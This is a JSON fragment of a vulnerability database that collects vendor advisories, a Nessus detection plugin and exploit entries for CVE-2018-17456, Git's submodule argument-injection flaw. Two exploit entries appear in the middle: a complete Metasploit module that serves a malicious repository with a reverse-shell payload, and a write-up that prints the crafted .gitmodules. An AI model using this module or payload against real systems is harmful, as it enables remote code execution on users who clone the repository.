\"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:10:33", "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-11T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2018-283-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "p-cpe:/a:slackware:slackware_linux:git", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-283-01.NASL", "href": "https://www.tenable.com/plugins/nessus/118059", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-283-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118059);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"SSA\", value:\"2018-283-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2018-283-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.442862\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4819b2c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"2.19.1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.19.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:38:29", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**CentOS Errata and Security Advisory** CESA-2018:3408\n\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-December/035140.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2018-November/005748.html\n\n**Affected packages:**\nemacs-git\nemacs-git-el\ngit\ngit-all\ngit-bzr\ngit-cvs\ngit-daemon\ngit-email\ngit-gnome-keyring\ngit-gui\ngit-hg\ngit-instaweb\ngit-p4\ngit-svn\ngitk\ngitweb\nperl-Git\nperl-Git-SVN\n\n**Upstream details at:**\n", "edition": 86, "modified": "2018-12-13T20:45:19", "published": "2018-11-20T23:41:54", "id": "CESA-2018:3408", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2018-November/005748.html", "title": "emacs, git, gitk, gitweb, perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-10-09T02:17:03", "description": "", "published": "2018-10-08T00:00:00", "type": "packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-08T00:00:00", "id": "PACKETSTORM:149709", "href": "https://packetstormsecurity.com/files/149709/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`These releases fix a security flaw (CVE-2018-17456), which allowed an \nattacker to execute arbitrary code by crafting a malicious .gitmodules \nfile in a project cloned with --recurse-submodules. \n \nWhen running \"git clone --recurse-submodules\", Git parses the supplied \n.gitmodules file for a URL field and blindly passes it as an argument \nto a \"git clone\" subprocess. If the URL field is set to a string that \nbegins with a dash, this \"git clone\" subprocess interprets the URL as \nan option. This can lead to executing an arbitrary script shipped in \nthe superproject as the user who ran \"git clone\". \n \nIn addition to fixing the security issue for the user running \"clone\", \nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can \nbe used to detect such malicious repository content when fetching or \naccepting a push. See \"transfer.fsckObjects\" in git-config(1). \n \nCredit for finding and fixing this vulnerability goes to joernchen \nand Jeff King, respectively. \n \nP.S. Folks at Microsoft tried to follow the known exploit recipe on \nGit for Windows (but not Cygwin or other Git implementations on \nWindows) and found that the recipe (or its variants they can think \nof) would not make their system vulnerable. This is due to the fact \nthat the type of submodule path require by the known exploit recipe \ncannot be created on Windows. Nonetheless, it is possible we have \nmissed some exploitation path and users are encouraged to upgrade. \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149709/gitmodule-exec.txt"}, {"lastseen": "2018-11-16T02:15:59", "description": "", "published": "2018-11-15T00:00:00", "type": "packetstorm", "title": "Malicious Git HTTP Server", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-11-15T00:00:00", "id": "PACKETSTORM:150380", "href": "https://packetstormsecurity.com/files/150380/Malicious-Git-HTTP-Server.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::Git \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Malicious Git HTTP Server For CVE-2018-17456', \n'Description' => %q( \nThis module exploits CVE-2018-17456, which affects Git \nversions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower. \n \nWhen a submodule url which starts with a dash e.g \"-u./payload\" is passed \nas an argument to git clone, the file \"payload\" inside the repository \nis executed. \n \nThis module creates a fake git repository which contains a submodule \ncontaining the vulnerability. The vulnerability is triggered when the \nsubmodules are initialised (e.g git clone --recurse-submodules URL) \n), \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2018-17456'], \n['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ], \n['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ], \n['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ], \n], \n'DisclosureDate' => 'Oct 05 2018', \n'Targets' => [ \n['Automatic', \n{ \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => {'Compat' => {'PayloadType' => 'python'}} \n} \n] \n], \n'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), \nOptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) \n] \n) \nend \n \ndef setup \n@repo_data = { \ngit: { files: {} } \n} \nsetup_git \nsuper \nend \n \ndef setup_git \n# URI must start with a / \nunless git_uri && git_uri.start_with?('/') \nfail_with(Failure::BadConfig, 'GIT_URI must start with a /') \nend \n \npayload_content = \"#!/bin/sh\\n#{payload.raw} &\" \npayload_file = Rex::Text.rand_text_alpha(4..6) \n \nsubmodule_path = datastore['GIT_SUBMODULE'] \nif submodule_path.blank? \nsubmodule_path = Rex::Text.rand_text_alpha(2..6).downcase + \":\" + Rex::Text.rand_text_alpha(2..6).downcase \nend \nunless submodule_path.include?\":\" \nfail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :') \nend \n \ngitmodules = \"[submodule \\\"#{submodule_path}\\\"] \npath = #{submodule_path} \nurl = -u./#{payload_file} \n\" \n \nsha1, content = build_object('blob', gitmodules) \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \npayloadsha1, content = build_object('blob', payload_content) \n@repo_data[:git][:files][\"/objects/#{get_path(payloadsha1)}\"] = content \n \ntree = \"100644 .gitmodules\\0#{[sha1].pack('H*')}\" \ntree += \"100744 #{payload_file}\\0#{[payloadsha1].pack('H*')}\" \ntree += \"160000 #{submodule_path}\\0#{[sha1].pack('H*')}\" \nsha1, content = build_object('tree', tree) \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n \nsha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n@repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\" \n@repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\" \nend \n \ndef primer \n# add the git and mercurial URIs as necessary \nhardcoded_uripath(git_uri) \ngit_url = URI.parse(get_uri).merge(git_uri) \nprint_status(\"Malicious Git URI is #{git_url}\") \nprint_status(\"git clone --recurse-submodules #{git_url}\") \nend \n \n# handles git clone \ndef on_request_uri(cli, req) \nreq_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') \nif @repo_data[:git][:files].key?(req_file) \nvprint_status(\"Sending Git #{req_file}\") \nsend_response(cli, @repo_data[:git][:files][req_file]) \nelse \nvprint_status(\"Git #{req_file} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI \ndef git_uri \nreturn @git_uri if @git_uri \nif datastore['GIT_URI'].blank? \n@git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git' \nelse \n@git_uri = datastore['GIT_URI'] \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150380/git_submodule_url_exec.rb.txt"}, {"lastseen": "2018-10-17T18:18:51", "description": "", "published": "2018-10-17T00:00:00", "type": "packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-17T00:00:00", "id": "PACKETSTORM:149836", "href": "https://packetstormsecurity.com/files/149836/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`# CVE-2018-17456 \n \nI've gotten a couple of questions about exploitation for the \n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we \ngo with some technical details. \n \n## TL;DR \n \n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. \nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip \n \n## Exploitation \n \nThe `.gitmodules` file looks as follows: \n \n``` \n[submodule \"x:x\"] \npath = x:x \nurl = -u./payload \n``` \n \nThe actual command being injected is set by the url, `-u./payload` \npoints the `upload-pack` flag of git clone to the `payload` shell \nscript. Note also the `:` within the path, this part is needed to \nactually get the `payload` script executed. \n \nThe path will end up as the repository URL in the subsequent `clone` \noperation: \n \n``` \nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\", \n\"--no-checkout\", \"--progress\", \"--separate-git-dir\", \n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],... \n``` \n \nAs the actual URL from `.gitmodules` is interpreted as the `-u` \nargument. \n \nThe colon is due to the fact, that the colon character let us go past \nthose lines in `transport.c`: \n \n```c \n} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { \nstruct bundle_transport_data *data = xcalloc(1, sizeof(*data)); \ntransport_check_allowed(\"file\"); \nret->data = data; \nret->vtable = &bundle_vtable; \nret->smart_options = NULL; \n``` \n \nDue to `url_is_local_not_ssh` will return false due to the colon \nin the path. And therefore later on in the code the smart_options \ncontaining the `uploadpack` setting are still in place: \n \n```c \n} else { \n/* Unknown protocol in URL. Pass to external handler. */ \nint len = external_specification_len(url); \nchar *handler = xmemdupz(url, len); \ntransport_helper_init(ret, handler); \n} \n \nif (ret->smart_options) { \nret->smart_options->thin = 1; \nret->smart_options->uploadpack = \"git-upload-pack\"; \nif (remote->uploadpack) \nret->smart_options->uploadpack = remote->uploadpack; \nret->smart_options->receivepack = \"git-receive-pack\";1 \nif (remote->receivepack) \nret->smart_options->receivepack = remote->receivepack; \n} \n``` \n \n## Further hints \n \nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows \nas a colon is a forbidden character within a path on Windows. However as noted by \nsome people during the disclosure: Git running within the Windows Subsystem for Linux or \ncygwin will allow exploitation on Windows hosts. \n \nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) \nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149836/gitsubmod-exec.txt"}], "debian": [{"lastseen": "2020-09-22T12:57:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4311-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 05, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-17456\n\njoernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2018-10-05T19:29:54", "published": "2018-10-05T19:29:54", "id": "DEBIAN:DSA-4311-1:A583A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00242.html", "title": "[SECURITY] [DSA 4311-1] git security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "\nThe Git community reports:\n\nMultiple vulnerabilities.\n\n", "edition": 3, "modified": "2018-10-05T00:00:00", "published": "2018-10-05T00:00:00", "id": "8C08AB4C-D06C-11E8-B35C-001B217B3468", "href": "https://vuxml.freebsd.org/freebsd/8c08ab4c-d06c-11e8-b35c-001b217b3468.html", "title": "Libgit2 -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "[1.8.3.1-20]\n- Fix CVE-2018-17456: arbitrary code execution via .gitmodules\n Thanks to Jonathan Nieder \n for backporting to 2.1.x\n and to Steve Beattie \n for backporting to 1.9.1", "edition": 4, "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "ELSA-2018-3408", "href": "http://linux.oracle.com/errata/ELSA-2018-3408.html", "title": "git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T00:32:58", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "[1.7.1-10]\n- fixes arbitrary code execution via .gitmodules\n Resolves: CVE-2018-17456", "edition": 1, "modified": "2020-02-03T00:00:00", "published": "2020-02-03T00:00:00", "id": "ELSA-2020-0316", "href": "http://linux.oracle.com/errata/ELSA-2020-0316.html", "title": "git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**Issue Overview:**\n\nGit before 2.14.5, allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.([CVE-2018-17456 __](<https://access.redhat.com/security/cve/CVE-2018-17456>))\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n git-debuginfo-2.14.5-1.59.amzn1.i686 \n git-svn-2.14.5-1.59.amzn1.i686 \n git-daemon-2.14.5-1.59.amzn1.i686 \n git-2.14.5-1.59.amzn1.i686 \n \n noarch: \n git-p4-2.14.5-1.59.amzn1.noarch \n git-email-2.14.5-1.59.amzn1.noarch \n perl-Git-SVN-2.14.5-1.59.amzn1.noarch \n git-hg-2.14.5-1.59.amzn1.noarch \n emacs-git-2.14.5-1.59.amzn1.noarch \n emacs-git-el-2.14.5-1.59.amzn1.noarch \n git-all-2.14.5-1.59.amzn1.noarch \n perl-Git-2.14.5-1.59.amzn1.noarch \n git-bzr-2.14.5-1.59.amzn1.noarch \n git-cvs-2.14.5-1.59.amzn1.noarch \n gitweb-2.14.5-1.59.amzn1.noarch \n \n src: \n git-2.14.5-1.59.amzn1.src \n \n x86_64: \n git-daemon-2.14.5-1.59.amzn1.x86_64 \n git-svn-2.14.5-1.59.amzn1.x86_64 \n git-2.14.5-1.59.amzn1.x86_64 \n git-debuginfo-2.14.5-1.59.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2018-10-17T22:02:00", "published": "2018-10-17T22:02:00", "id": "ALAS-2018-1093", "href": "https://alas.aws.amazon.com/ALAS-2018-1093.html", "title": "Important: git", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**Issue Overview:**\n\nGit before 2.14.5, allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.([CVE-2018-17456 __](<https://access.redhat.com/security/cve/CVE-2018-17456>))\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n git-2.14.5-1.amzn2.i686 \n git-core-2.14.5-1.amzn2.i686 \n git-core-doc-2.14.5-1.amzn2.i686 \n git-daemon-2.14.5-1.amzn2.i686 \n git-svn-2.14.5-1.amzn2.i686 \n git-gnome-keyring-2.14.5-1.amzn2.i686 \n git-debuginfo-2.14.5-1.amzn2.i686 \n \n noarch: \n git-all-2.14.5-1.amzn2.noarch \n gitweb-2.14.5-1.amzn2.noarch \n git-p4-2.14.5-1.amzn2.noarch \n git-cvs-2.14.5-1.amzn2.noarch \n git-email-2.14.5-1.amzn2.noarch \n git-gui-2.14.5-1.amzn2.noarch \n gitk-2.14.5-1.amzn2.noarch \n perl-Git-2.14.5-1.amzn2.noarch \n perl-Git-SVN-2.14.5-1.amzn2.noarch \n \n src: \n git-2.14.5-1.amzn2.src \n \n x86_64: \n git-2.14.5-1.amzn2.x86_64 \n git-core-2.14.5-1.amzn2.x86_64 \n git-core-doc-2.14.5-1.amzn2.x86_64 \n git-daemon-2.14.5-1.amzn2.x86_64 \n git-svn-2.14.5-1.amzn2.x86_64 \n git-gnome-keyring-2.14.5-1.amzn2.x86_64 \n git-debuginfo-2.14.5-1.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2018-10-24T16:31:00", "published": "2018-10-24T16:31:00", "id": "ALAS2-2018-1093", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-1093.html", "title": "Important: git", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2018-10-12T14:30:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive "git clone" of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. (boo#1110949).\n\n", "edition": 1, "modified": "2018-10-12T12:11:54", "published": "2018-10-12T12:11:54", "id": "OPENSUSE-SU-2018:3109-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00028.html", "title": "Security update for git (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-08T17:30:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for libgit2 fixes the following issues:\n\n\n Security issue fixed:\n\n - CVE-2018-17456: Submodule URLs and paths with a leading "-" are now\n ignored to avoid injecting options into library consumers that perform\n recursive clones (bsc#1110949).\n\n\n Non-security issues fixed:\n\n - Version update to version 0.26.8 (bsc#1114729).\n - Full changelog can be found at:\n * <a rel=\"nofollow\" href=\"https://github.com/libgit2/libgit2/releases/tag/v0.26.8\">https://github.com/libgit2/libgit2/releases/tag/v0.26.8</a>\n * <a rel=\"nofollow\" href=\"https://github.com/libgit2/libgit2/releases/tag/v0.26.7\">https://github.com/libgit2/libgit2/releases/tag/v0.26.7</a>\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-12-08T15:09:50", "published": "2018-12-08T15:09:50", "id": "OPENSUSE-SU-2018:4051-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00019.html", "title": "Security update for libgit2 (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-17T08:31:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive "git clone" of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. (boo#1110949).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-10-17T06:09:56", "published": "2018-10-17T06:09:56", "id": "OPENSUSE-SU-2018:3178-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00030.html", "title": "Security update for git (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-10-09T02:49:06", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-10-09T00:00:00", "title": "Git Submodule - Arbitrary Code Execution Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-09T00:00:00", "id": "1337DAY-ID-31270", "href": "https://0day.today/exploit/description/31270", "sourceData": "These releases fix a security flaw (CVE-2018-17456), which allowed an\r\nattacker to execute arbitrary code by crafting a malicious .gitmodules\r\nfile in a project cloned with --recurse-submodules.\r\n \r\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\r\n.gitmodules file for a URL field and blindly passes it as an argument\r\nto a \"git clone\" subprocess. If the URL field is set to a string that\r\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\r\nan option. This can lead to executing an arbitrary script shipped in\r\nthe superproject as the user who ran \"git clone\".\r\n \r\nIn addition to fixing the security issue for the user running \"clone\",\r\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\r\nbe used to detect such malicious repository content when fetching or\r\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\r\n \r\nCredit for finding and fixing this vulnerability goes to joernchen\r\nand Jeff King, respectively.\r\n \r\nP.S. Folks at Microsoft tried to follow the known exploit recipe on\r\nGit for Windows (but not Cygwin or other Git implementations on\r\nWindows) and found that the recipe (or its variants they can think\r\nof) would not make their system vulnerable. This is due to the fact\r\nthat the type of submodule path require by the known exploit recipe\r\ncannot be created on Windows. Nonetheless, it is possible we have\r\nmissed some exploitation path and users are encouraged to upgrade.\n\n# 0day.today [2018-10-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31270"}], "slackware": [{"lastseen": "2020-10-25T16:36:04", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/git-2.14.5-i586-1_slack14.2.txz: Upgraded.\n This update fixes a security issue:\n Submodules' \"URL\"s come from the untrusted .gitmodules file, but we\n blindly gave it to \"git clone\" to clone submodules when \"git clone\n --recurse-submodules\" was used to clone a project that has such a\n submodule. The code has been hardened to reject such malformed URLs\n (e.g. one that begins with a dash). Credit for finding and fixing this\n vulnerability goes to joernchen and Jeff King, respectively.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 